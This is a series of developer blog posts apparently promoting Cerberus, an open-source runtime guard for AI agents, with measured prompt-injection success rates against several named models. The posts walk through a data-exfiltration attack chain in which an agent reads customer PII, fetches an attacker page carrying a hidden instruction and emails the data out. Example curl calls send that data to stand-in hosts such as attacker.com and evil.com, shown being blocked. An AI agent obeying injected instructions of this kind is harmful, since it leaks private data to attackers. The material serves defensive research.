DEV Community: Dre

We Tested Agentic AI Against 525 Real Attacks. Here's What We Found.

Dre — Fri, 13 Mar 2026 04:14:19 +0000

We Tested Agentic AI Against 525 Real Attacks. Here's What We Found.

We ran the numbers. The threat is real.

For the past several months, we've been building and validating Cerberus — an open-source runtime security harness for agentic AI systems. We designed it around a specific threat model we call the Lethal Trifecta: the simultaneous convergence, within a single AI execution turn, of privileged data access, untrusted content injection, and an outbound exfiltration path.

We just finished our first formal validation run. N=525 attack trials across three major AI providers. Here is what the data shows.

Attack Success Rates (full injection compliance — agent fully redirected to attacker's address):
• GPT-4o-mini: 90.3% [95% CI: 84.8%–93.9%] — Causation Score: 0.811
• Gemini 2.5 Flash: 82.4% [95% CI: 75.9%–87.5%] — Causation Score: 0.702
• Claude Sonnet: 6.7% [95% CI: 3.8%–11.5%] — Causation Score: 0.207

Control group: 0/30 exfiltrations across all providers (clean baseline). Fisher's exact test: OpenAI p<0.0001, Google p<0.0001 — both statistically significant.

"This is not a theoretical vulnerability. At a 90% success rate, the Lethal Trifecta is a reliable attack primitive against current production AI systems."

What is the Lethal Trifecta — and why does it matter in supply chain and finance?

The attack chain requires three conditions to align within a single execution turn:

• Privileged data access — the agent can see sensitive operational or financial data
• Untrusted content injection — the agent is processing external input: a vendor document, an invoice, a client email, a compliance filing
• An outbound exfiltration path — the agent has the authority to take downstream action

In supply chain environments, AI agents orchestrating procurement workflows read vendor submissions, cross-reference inventory systems, and trigger purchase orders. In financial services, agents summarize client portfolios, process compliance documents, and triage transactions. Both architectures deliver all three trifecta conditions by design.

This is not a niche edge case. It is the default configuration of agentic AI in both industries — and our data shows that two of the three major model providers are vulnerable to it at rates above 80%.

What Cerberus detected — and where the gaps are

Cerberus operates in three detection layers. The validation ran in observe-only mode — agents behaved exactly as they normally would, and Cerberus recorded what it saw without intervening.

Detection Layer Results (N=525):
• L1 — Data Source Monitoring: 100% across all providers [97.9%, 100%]
• L2 — Token Provenance Tracking: 100% across all providers [97.9%, 100%]
• L3 — Outbound Intent Detection: 13.7% (OpenAI) / 1.1% (Anthropic) / 65.7% (Google)

Overall detection rate: 28.5% [24.7%, 32.6%]. False positive rate: 0.0% [0.0%, 11.4%] — zero false triggers across 30 clean control runs.

Per-Category Detection (all providers combined):
• Direct Injection: 37.8% [28.5%, 48.1%]
• Encoded/Obfuscated: 37.5% [27.2%, 49.0%]
• Multi-turn: 33.3% [22.9%, 45.6%]
• Multilingual: 33.3% [22.9%, 45.6%]
• Advanced Technique: 20.0% [14.1%, 27.5%]
• Social Engineering: 15.3% [8.8%, 25.3%]

The L3 detection gap is a known limitation and the active development focus. L1 and L2 coverage is production-ready. L3 is where the adversarial arms race is happening.

Zero performance overhead

• p50: 52μs per session
• p99: 0.23ms per session
• Overhead: 0.01% of typical LLM latency (~2s)

Against a typical LLM response time of ~2 seconds, Cerberus adds 0.01% overhead at p99. There is no meaningful performance argument against deploying it.

What this means if you're running AI in supply chain or financial services

If your agentic AI deployment uses GPT-4o-mini or Gemini and processes external documents — vendor submissions, invoices, client communications, compliance filings — the Lethal Trifecta succeeds against it at a rate above 80%.

The question is not whether this attack is theoretically possible. The question is whether you have a runtime layer that can detect when all three trifecta conditions are active in a single execution turn. Most deployments today do not.

Cerberus is open source. L1 and L2 detection are production-ready. L3 is under active development with full transparency on where the gaps are. That's the honest state of the tooling — and it's already more runtime visibility than any comparable open-source option provides today.

🔗 github.com/odinforge/cerberus
📦 npm: @cerberus-ai/core (signed provenance)
🧪 demo.cerberus.sixsenseenterprise.com
🌐 sixsenseenterprise.com

AISecurity #AgenticAI #SupplyChain #FinancialServices #CyberSecurity #RuntimeSecurity #PromptInjection #OpenSource #Cerberus #SixSense #LLMSecurity #RedTeam

We Open-Sourced Cerberus — Runtime Security for Agentic AI

Dre — Tue, 10 Mar 2026 03:39:08 +0000

I’ve been following the [un]prompted conference agenda this week — one of the most practitioner-focused AI security events out there. Two things jumped out at me.
Stripe has a talk called “Breaking the Lethal Trifecta.” Google’s talk describes the same problem as the “Perfect Storm” — sensitive data, untrusted content, external execution, all in the same execution turn.
I’ve been building a tool that catches exactly this. Seeing it on the agenda confirmed we were working on the right problem. So today we’re open-sourcing Cerberus.
What is the Lethal Trifecta?
Three conditions that make agentic AI exploitable in a single execution turn:
1. Privileged data access — the agent can read secrets, configs, or sensitive context
2. Untrusted content injection — an adversarial payload reaches the model’s input
3. Outbound exfiltration path — the agent can write to an external destination
When all three are present simultaneously, a single injected sentence can exfiltrate secrets, poison memory for future sessions, or pivot across tool calls — no human in the loop.
Existing tools check each leg in isolation. Nobody was correlating all three in real time. That’s the gap Cerberus closes.
How Cerberus Works
Cerberus wraps your LLM calls and monitors each execution turn as a complete unit — inputs, tool calls, outputs, and memory state — not individual signals.
Four detection layers:
∙ L1 — Pattern matching (fast, low false-positive rate)
∙ L2 — Semantic analysis (catches obfuscated payloads)
∙ L3 — Behavioral heuristics (unusual tool call sequences)
∙ L4 — Correlation engine (are all three Trifecta legs present?)
Plus a SQLite-backed memory contamination graph for cross-session taint tracking.
The Numbers
∙ 326 tests, 99.7% coverage
∙ 21-payload attack harness across 5 attack categories
∙ 100% attack detection validated before shipping any detection layer
∙ Multi-model validation against Claude, GPT-4o, and Gemini in progress

I built a live interactive attack demo — watch real prompt injection happen and get blocked in real time

Dre — Thu, 05 Mar 2026 11:46:35 +0000

If you've been following Cerberus, the open-source agentic AI security layer I've been building, here's something new: a live interactive demo running on a real server with real Grafana metrics.

→ demo.cerberus.sixsenseenterprise.com

What it does

Pick a scenario. Hit Run. Watch step cards populate as the attack executes. Watch the Grafana panel spike. Everything is real — real Cerberus guard() middleware, real OpenTelemetry spans, real Prometheus scraping, real Grafana rendering.

The scenarios

Scenario	Steps	Expected outcome
Clean Run (Control)	2	Passes — score stays 1
Data Exfiltration	2	Logged — score 2
Prompt Injection	1	Logged — score 2
Full Lethal Trifecta	3	BLOCKED — score 4
Encoded Injection (Base64)	3	BLOCKED — score 4
Social Engineering	3	BLOCKED — score 4
Enterprise APT Simulation	19	BLOCKED at step 19

The Enterprise APT scenario is the interesting one

19 steps. Twelve legitimate internal reads (HR, finance, CRM, payroll, contracts, audit logs, secrets vault). One clean external fetch (vendor portal). One injection delivery disguised as a "GDPR regulatory update" from compliance-verify.net. Two authorized sends to acme.com — these pass. One attempted exfiltration to data-audit@compliance-verify.net — blocked.

The authorizedDestinations config is key. Cerberus tracks what's authorized in context. Legitimate sends don't get blocked. Only the attacker's destination does.


typescript
const guarded = guard(executors, {
  threshold: 3,
  alertMode: 'interrupt',
  opentelemetry: true,
  authorizedDestinations: ['acme.com', 'deloitte.com'],
  // ...
}, outboundTools);

Zero-Code-Change AI Security: Cerberus Now Runs as an HTTP Proxy

Dre — Wed, 04 Mar 2026 21:44:28 +0000

Most security tooling asks you to change your agent's code. Wrap this, extend that, swap your tool executor. If you're deep in a LangChain or OpenAI Agents setup that's already running in prod, that's friction.

New in Cerberus: proxy/gateway mode. Same detection, zero changes to your agent.

How it works

Instead of wrapping your executors with guard(), you spin up a Cerberus proxy and route your agent's tool calls through it:

import { createProxy } from '@cerberus-ai/core';

const proxy = createProxy({
port: 4000,
cerberus: { alertMode: 'interrupt', threshold: 3 },
tools: {
readCustomerData: {
target: 'http://localhost:3001/readCustomerData',
trustLevel: 'trusted',
},
fetchWebpage: {
target: 'http://localhost:3001/fetchWebpage',
trustLevel: 'untrusted',
},
sendEmail: {
target: 'http://localhost:3001/sendEmail',
outbound: true,
},
},
});

await proxy.listen(); // port 4000
Your agent calls POST http://localhost:4000/tool/sendEmail with { "args": {...} } instead of calling the tool server directly. That's the only change.

What the proxy returns

Allowed call:

200 { "result": "Email sent to user@company.com" }
Lethal Trifecta detected (L1 + L2 + L3 fires):

403 { "blocked": true, "message": "[Cerberus] Tool call blocked — risk score 3/4" }
Plus X-Cerberus-Blocked: true header.

The thing that makes this work: session state

The Lethal Trifecta attack pattern isn't a single call — it's a sequence. Turn 1: agent reads private customer data (L1). Turn 2: agent fetches an attacker-controlled page that contains an injection (L2). Turn 3: agent sends an email to an external address with that data in the body (L3). Score hits 3/4. Blocked.

In proxy mode, each agent run sends a X-Cerberus-Session header. The proxy maintains independent detection state per session ID, so cumulative scoring works across multiple HTTP requests from the same run. The attack pattern is detected whether you're using guard() inline or routing through the proxy.

curl -X POST http://localhost:4000/tool/readCustomerData \
-H "X-Cerberus-Session: run-abc123" \
-H "Content-Type: application/json" \
-d '{"args": {}}'

200 — score 1/4

curl -X POST http://localhost:4000/tool/fetchWebpage \
-H "X-Cerberus-Session: run-abc123" \
-d '{"args": {"url": "https://attacker.com/payload"}}'

200 — score 2/4

curl -X POST http://localhost:4000/tool/sendEmail \
-H "X-Cerberus-Session: run-abc123" \
-d '{"args": {"to": "audit@evil.com", "body": ""}}'

403 — score 3/4 — BLOCKED

Under the hood

Pure node:http — zero new dependencies
GET /health → { "status": "ok", "sessions": N } for monitoring
Sessions auto-expire after 30 minutes of inactivity
Supports HTTP upstream targets or local handlers (useful for testing)
733 tests, 98%+ coverage
The proxy joins guard() (inline wrapping) and the framework adapters (LangChain, Vercel AI, OpenAI Agents) as a third integration path. Pick the one that fits where you are.

Repo: github.com/Odingard/cerberus
npm: npm install @cerberus-ai/core

I ran 765 controlled experiments to prove AI agents are leaking your data — and built the tool that catches it

Dre — Wed, 04 Mar 2026 06:27:47 +0000

Every AI agent that can read private data, fetch external content, and send
outbound messages is one injected instruction away from exfiltrating everything
it knows.

This isn't theoretical. Here's the attack in three tool calls:

Turn 0: readPrivateData() → 5 customer records loaded (SSNs, emails, phones)
fetchExternalContent(url) → attacker's webpage, payload embedded in HTML
Turn 1: sendOutboundReport() → all PII sent to attacker's address
Turn 2: "Report sent successfully!"

Total time: ~12 seconds. Cost: $0.001. No exploits. No credentials. Just a
fetched webpage and a compliant model.

We measured it. Rigorously.

30 injection payloads across 6 categories — direct injection, encoded/obfuscated
(Base64, ROT13, hex, Unicode), social engineering (CEO fraud, IT impersonation,
legal threats), multi-turn (persistent rules, delayed triggers, context poisoning),
multilingual (Spanish, Mandarin, Arabic, Russian), and advanced techniques.

Tested against three major LLM providers. N=285 total runs with Wilson 95%
confidence intervals:

Provider	Attack Success	95% CI
GPT-4o-mini	93.3%	[86.2%, 96.9%]
Gemini 2.5 Flash	92.2%	[84.8%, 96.2%]
Claude Sonnet	13.3%	[7.8%, 21.9%]

Two of the three most widely deployed AI providers are fully exploitable today.

Claude resists — but its 7.8% CI floor is not zero, and not acceptable for
enterprise PII. Its resistance reflects training against known payload patterns,
not elimination of the underlying architectural condition.

The architectural condition is what matters

I call it the Lethal Trifecta. Any agent that can:

Access privileged data
Process untrusted external content
Take outbound actions

...is exploitable. Not because of a bug. Because of what makes it useful.

We also built the defense. And proved it works.

Cerberus is a runtime security platform that wraps your tool executors —
one function call — and detects this attack pattern in real time.


typescript
import { guard } from '@cerberus-ai/core';

const { executors: secured } = guard(
  { readDatabase, fetchUrl, sendEmail },
  {
    alertMode: 'interrupt',
    threshold: 3,
    trustOverrides: [
      { toolName: 'readDatabase', trustLevel: 'trusted' },
      { toolName: 'fetchUrl', trustLevel: 'untrusted' },
    ],
  },
  ['sendEmail'] // outbound tools Cerberus monitors
);

// Use secured.readDatabase(), secured.fetchUrl(), secured.sendEmail()
// Cerberus intercepts transparently. No framework changes required.

We ran the same 30-payload suite a second time with Cerberus in observe-only
mode (N=480 runs):

0.0% false positive rate [0.0%, 11.4%] — zero false alerts on 30 clean sessions
100% accuracy on L1 and L2 — every privileged data read and untrusted content fetch tagged, deterministically
L3 catches every confirmed exfiltration — fires when PII actually flows to an unauthorized destination, not before
No prior prompt injection study has paired attack measurement with defensive
validation in the same experimental framework. We didn't want to just claim
detection — we wanted to prove it with the same rigor we used to prove the attack.

What's inside
Four detection layers sharing one correlation engine:

L1 — Tags every tool call by data trust level at access time. Detects secrets (AWS keys, JWTs, API tokens) in tool results.
L2 — Labels context tokens by origin before the LLM call. Detects injection patterns, encoding/obfuscation, and MCP tool poisoning.
L3 — Catches PII flowing to unauthorized destinations. Classifies suspicious domains (disposable emails, webhook services, IP addresses).
L4 — Tracks taint propagation through persistent memory across sessions. The first deployable defense against the MINJA (NeurIPS 2025) memory contamination attack class.
A correlation engine builds a 4-bit risk vector per turn, scores it 0-4, and
interrupts tool calls that cross the threshold.

Get it

npm install @cerberus-ai/core
MIT licensed. 718 tests at 98%+ coverage. Works with LangChain, Vercel AI SDK,
and OpenAI Agents SDK out of the box.




  
    
      
      
        Odingard
       / 
        cerberus
      
    
    
      Agentic AI runtime security — detects and interrupts prompt injection, data exfiltration, and memory contamination attacks in real-time.
    
  
  
    



Cerberus


Runtime Security For AI Agent Tool Execution








Embeddable runtime enforcement for AI agents. Cerberus correlates privileged data access, untrusted content ingestion, and outbound behavior at the tool-call level, then interrupts guarded outbound actions before they execute.

Docs · npm · PyPI · Enterprise








Note
Cerberus is the agentic AI security layer of Six Sense Enterprise Services. The core detection library (@cerberus-ai/core) is MIT licensed and free. The Enterprise edition adds a self-hosted Gateway, Grafana monitoring stack, and production deployment tooling for teams running AI agents in production.






Table of Contents



🎯 What is Cerberus?
🎬 In Action
✨ What It Detects
📦 Editions
🚀 Quickstart
📊 Empirical Results
🏗️ Architecture
OWASP Alignment
🔌 Framework Integrations
⚡ Performance
🗺️ Roadmap
⚠️ Honest Limitations
📜 License






🎯 What is Cerberus?


Every AI agent that can (1) access private data, (2) read external content, and (3) send data outbound…





  View on GitHub






Full methodology, per-payload results, and execution traces are in

docs/research-results.md in the repo. All numbers are reproducible.

DEV Community: Dre

We Tested Agentic AI Against 525 Real Attacks. Here's What We Found.

AISecurity #AgenticAI #SupplyChain #FinancialServices #CyberSecurity #RuntimeSecurity #PromptInjection #OpenSource #Cerberus #SixSense #LLMSecurity #RedTeam

We Open-Sourced Cerberus — Runtime Security for Agentic AI

I built a live interactive attack demo — watch real prompt injection happen and get blocked in real time

What it does

The scenarios

The Enterprise APT scenario is the interesting one

Zero-Code-Change AI Security: Cerberus Now Runs as an HTTP Proxy

200 — score 1/4

200 — score 2/4

403 — score 3/4 — BLOCKED

I ran 765 controlled experiments to prove AI agents are leaking your data — and built the tool that catches it

We measured it. Rigorously.

The architectural condition is what matters

We also built the defense. And proved it works.

Odingard / cerberus

Agentic AI runtime security — detects and interrupts prompt injection, data exfiltration, and memory contamination attacks in real-time.

Cerberus

Table of Contents

🎯 What is Cerberus?